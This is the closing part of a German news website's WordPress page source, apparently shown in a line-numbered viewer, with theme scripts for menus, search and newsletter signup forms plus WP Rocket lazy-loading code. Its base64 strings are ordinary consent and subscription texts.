title","f_title_font_settings":"","f_title_font_style":"","f_title_font_transform":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_font_weight":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","el_class":"","block_template_id":"","td_column_number":1,"header_color":"","ajax_pagination_infinite_stop":"","offset":"","limit":"5","td_ajax_preloading":"","td_ajax_filter_type":"","td_filter_default_txt":"","td_ajax_filter_ids":"","color_preset":"","ajax_pagination":"","ajax_pagination_next_prev_swipe":"","border_top":"","css":"","class":"tdi_51","tdc_css_class":"tdi_51","tdc_css_class_style":"tdi_51_rand_style"}';
  2970.                tdbSearchItem.jqueryObj = jQuery('.tdi_51');
  2971.                tdbSearchItem._openSearchFormClass = 'tdb-drop-down-search-open';
  2972.                tdbSearchItem._resultsLimit = '6';
  2973.  
  2974.                
  2975.            
  2976.                
  2977.                tdbSearch.addItem( tdbSearchItem );
  2978.  
  2979.            });
  2980.        
  2981.        
  2982.  
  2983.            
  2984.                /* global jQuery:{} */
  2985.                jQuery(document).ready( function () {
  2986.  
  2987.                    var tdbMenuItem = new tdbMenu.item();
  2988.                    tdbMenuItem.blockUid = 'tdi_63';
  2989.                    tdbMenuItem.jqueryObj = jQuery('.tdi_63');
  2990.  
  2991.                
  2992.                    tdbMenuItem.isMegaMenuFull = true;
  2993.  
  2994.                
  2995.                
  2996.                    tdbMenuItem.megaMenuLoadType = 'preload';
  2997.  
  2998.                
  2999.                    tdbMenu.addItem(tdbMenuItem);
  3000.  
  3001.                });
  3002.            
  3003.            
  3004.  
  3005.            
  3006.                /* global jQuery:{} */
  3007.                jQuery(document).ready( function () {
  3008.  
  3009.                    var tdbMenuItem = new tdbMenu.item();
  3010.                    tdbMenuItem.blockUid = 'tdi_76';
  3011.                    tdbMenuItem.jqueryObj = jQuery('.tdi_76');
  3012.  
  3013.                
  3014.                    tdbMenuItem.isMegaMenuFull = true;
  3015.  
  3016.                
  3017.                
  3018.                    tdbMenuItem.megaMenuLoadType = 'preload';
  3019.  
  3020.                
  3021.                    tdbMenu.addItem(tdbMenuItem);
  3022.  
  3023.                });
  3024.            
  3025.            
  3026.  
  3027.                
  3028.                    /* global jQuery:{} */
  3029.                    jQuery().ready(function () {
  3030.                        var block = jQuery('.tdi_97'),
  3031.                            modulesThumbs = block.find('.td-module-thumb'),
  3032.                            blockOffsetLeft;
  3033.  
  3034.                        if( block.hasClass('td-flb-margin-forced') ) {
  3035.                            jQuery(window).resize(function () {
  3036.                                blockOffsetLeft = block.offset().left;
  3037.  
  3038.                                if( block.hasClass('td-flb-margin-left') ) {
  3039.                                    modulesThumbs.css('margin-left', -blockOffsetLeft + 'px');
  3040.                                } else {
  3041.                                    modulesThumbs.css('margin-right', -(jQuery(window).width() - (blockOffsetLeft + block.outerWidth())) + 'px');
  3042.                                }
  3043.                            });
  3044.                            jQuery(window).resize();
  3045.                        }
  3046.                    });
  3047.                
  3048.            
  3049.  
  3050.                    
  3051.  
  3052.                        jQuery().ready(function () {
  3053.                            var tdsLeadsItem = new tdsLeads.item();
  3054.  
  3055.                            // Block unique ID.
  3056.                            tdsLeadsItem.blockUid = 'tdi_147';
  3057.                            tdsLeadsItem.jqueryObj = jQuery('.tdi_147');
  3058.  
  3059.                            // Google reCaptcha.
  3060.                            tdsLeadsItem.showCaptcha = false;
  3061.                            tdsLeadsItem.captchaSiteKey = '';
  3062.  
  3063.                            // Button texts.
  3064.                            tdsLeadsItem.subscribeBtnTxt = 'ich möchte rein'
  3065.                            tdsLeadsItem.unSubscribeBtnTxt = 'Unsubscribe'
  3066.  
  3067.                            // Acknowledgement checkbox.
  3068.                            tdsLeadsItem.acknowledgementCheckboxShow = true;
  3069.                            tdsLeadsItem.acknowledgementCheckboxMsg = 'SWNoJTIwaGFiZSUyMGRpZSUyMGdlbGVzZW4lMjB1bmQlMjBha3plcHRpZXJlJTIwc2llJTIwJTNDYSUyMGhyZWYlM0QlMjIlMjMlMjIlM0VEYXRlbnNjaHV0ei1CZXN0aW1tdW5nZW4lM0MlMkZhJTNFLg==';
  3070.  
  3071.                            // Redirect URLs.
  3072.                            tdsLeadsItem.subscribedRdrURL = '';
  3073.                            tdsLeadsItem.unSubscribedRdrURL = '';
  3074.  
  3075.                            // AJAX submit.
  3076.                            tdsLeadsItem.ajaxSubmit = false;
  3077.  
  3078.                            // In composer flag.
  3079.                            
  3080.                            
  3081.                            // info/error messages
  3082.                            tdsLeadsItem.messages = {"ack_require":"Best\u00e4tigung ist erforderlich!","captcha_user_score":"Captcha-Benutzerbewertung fehlgeschlagen. bitte kontaktieren Sie uns!","captcha_failed":"Captcha-\u00dcberpr\u00fcfung fehlgeschlagen!","success_subscribe":"Successfully subscribed!","success_unsubscribe":"Successfully unsubscribed!","input_placeholder":"E-Mail-Addresse","unsubscribe_msg":"U2llJTIwaGFiZW4lMjBkaWVzZSUyME1haWxpbmdsaXN0ZSUyMGJlcmVpdHMlMjBhYm9ubmllcnQhJTBB"};
  3083.  
  3084.                            tdsLeads.addItem( tdsLeadsItem );
  3085.  
  3086.                        });
  3087.  
  3088.                    
  3089.                
  3090.  
  3091.                
  3092.                    /* global jQuery:{} */
  3093.                    jQuery().ready(function () {
  3094.                        var block = jQuery('.tdi_182'),
  3095.                            modulesThumbs = block.find('.td-module-thumb'),
  3096.                            blockOffsetLeft;
  3097.  
  3098.                        if( block.hasClass('td-flb-margin-forced') ) {
  3099.                            jQuery(window).resize(function () {
  3100.                                blockOffsetLeft = block.offset().left;
  3101.  
  3102.                                if( block.hasClass('td-flb-margin-left') ) {
  3103.                                    modulesThumbs.css('margin-left', -blockOffsetLeft + 'px');
  3104.                                } else {
  3105.                                    modulesThumbs.css('margin-right', -(jQuery(window).width() - (blockOffsetLeft + block.outerWidth())) + 'px');
  3106.                                }
  3107.                            });
  3108.                            jQuery(window).resize();
  3109.                        }
  3110.                    });
  3111.                
  3112.            
  3113.  
  3114.                
  3115.                    /* global jQuery:{} */
  3116.                    jQuery().ready(function () {
  3117.                        var block = jQuery('.tdi_204'),
  3118.                            modulesThumbs = block.find('.td-module-thumb'),
  3119.                            blockOffsetLeft;
  3120.  
  3121.                        if( block.hasClass('td-flb-margin-forced') ) {
  3122.                            jQuery(window).resize(function () {
  3123.                                blockOffsetLeft = block.offset().left;
  3124.  
  3125.                                if( block.hasClass('td-flb-margin-left') ) {
  3126.                                    modulesThumbs.css('margin-left', -blockOffsetLeft + 'px');
  3127.                                } else {
  3128.                                    modulesThumbs.css('margin-right', -(jQuery(window).width() - (blockOffsetLeft + block.outerWidth())) + 'px');
  3129.                                }
  3130.                            });
  3131.                            jQuery(window).resize();
  3132.                        }
  3133.                    });
  3134.                
  3135.            
  3136.  
  3137.                    
  3138.  
  3139.                        jQuery().ready(function () {
  3140.                            var tdsLeadsItem = new tdsLeads.item();
  3141.  
  3142.                            // Block unique ID.
  3143.                            tdsLeadsItem.blockUid = 'tdi_238';
  3144.                            tdsLeadsItem.jqueryObj = jQuery('.tdi_238');
  3145.  
  3146.                            // Google reCaptcha.
  3147.                            tdsLeadsItem.showCaptcha = false;
  3148.                            tdsLeadsItem.captchaSiteKey = '';
  3149.  
  3150.                            // Button texts.
  3151.                            tdsLeadsItem.subscribeBtnTxt = 'ich möchte rein'
  3152.                            tdsLeadsItem.unSubscribeBtnTxt = 'Unsubscribe'
  3153.  
  3154.                            // Acknowledgement checkbox.
  3155.                            tdsLeadsItem.acknowledgementCheckboxShow = true;
  3156.                            tdsLeadsItem.acknowledgementCheckboxMsg = 'SWNoJTIwaGFiZSUyMGRpZSUyMGdlbGVzZW4lMjB1bmQlMjBha3plcHRpZXJlJTIwc2llJTIwJTNDYSUyMGhyZWYlM0QlMjJodHRwcyUzQSUyRiUyRm5hY2hyaWNodGVubW9yZ2VuLmRlJTJGZGF0ZW5zY2h1dHpiZXN0aW1tdW5nZW4lMkYlMjIlM0VEYXRlbnNjaHV0ei1CZXN0aW1tdW5nZW4lM0MlMkZhJTNFLg==';
  3157.  
  3158.                            // Redirect URLs.
  3159.                            tdsLeadsItem.subscribedRdrURL = 'https://nachrichtenmorgen.de/';
  3160.                            tdsLeadsItem.unSubscribedRdrURL = '';
  3161.  
  3162.                            // AJAX submit.
  3163.                            tdsLeadsItem.ajaxSubmit = false;
  3164.  
  3165.                            // In composer flag.
  3166.                            
  3167.                            
  3168.                            // info/error messages
  3169.                            tdsLeadsItem.messages = {"ack_require":"Best\u00e4tigung ist erforderlich!","captcha_user_score":"Captcha-Benutzerbewertung fehlgeschlagen. bitte kontaktieren Sie uns!","captcha_failed":"Captcha-\u00dcberpr\u00fcfung fehlgeschlagen!","success_subscribe":"Successfully subscribed!","success_unsubscribe":"Successfully unsubscribed!","input_placeholder":"E-Mail-Addresse","unsubscribe_msg":"WW91JTIwaGF2ZSUyMHN1YnNjcmliZWQlMjB0byUyMHRoaXMlMjBtYWlsaW5nJTIwbGlzdCE="};
  3170.  
  3171.                            tdsLeads.addItem( tdsLeadsItem );
  3172.  
  3173.                        });
  3174.  
  3175.                    
  3176.                
  3177. </script>
  3178.  
  3179.  
  3180. <script type="rocketlazyloadscript">var td_res_context_registered_atts=["style_general_mobile_menu","style_general_header_align","style_general_header_logo","style_general_mobile_search","style_general_popup_modal","style_general_column_title","style_general_single_image","style_general_button","style_general_list_menu","style_specific_list_menu_vertical","style_specific_list_menu_accordion","style_specific_list_menu_horizontal","style_general_module_header","style_general_header_search","style_general_header_search_trigger_enabled","style_general_header_menu","style_general_header_mega_menu","style_general_socials","style_general_inline_text","style_general_bgf","style_general_bgf_1_specific","style_general_tds_leads"];</script>
  3181. <script>window.lazyLoadOptions=[{elements_selector:"img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}},{elements_selector:".rocket-lazyload",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,}];window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(var i=0;i<mutation.addedNodes.length;i++){if(typeof mutation.addedNodes[i].getElementsByTagName!=='function'){continue}
  3182. if(typeof mutation.addedNodes[i].getElementsByClassName!=='function'){continue}
  3183. images=mutation.addedNodes[i].getElementsByTagName('img');is_image=mutation.addedNodes[i].tagName=="IMG";iframes=mutation.addedNodes[i].getElementsByTagName('iframe');is_iframe=mutation.addedNodes[i].tagName=="IFRAME";rocket_lazy=mutation.addedNodes[i].getElementsByClassName('rocket-lazyload');image_count+=images.length;iframe_count+=iframes.length;rocketlazy_count+=rocket_lazy.length;if(is_image){image_count+=1}
  3184. if(is_iframe){iframe_count+=1}}});if(image_count>0||iframe_count>0||rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)</script><script data-no-minify="1" async src="https://nachrichtenmorgen.de/wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js"></script>
  3185. </body>
  3186. </html>
  3187.  
  3188. <!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1715104135 -->
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda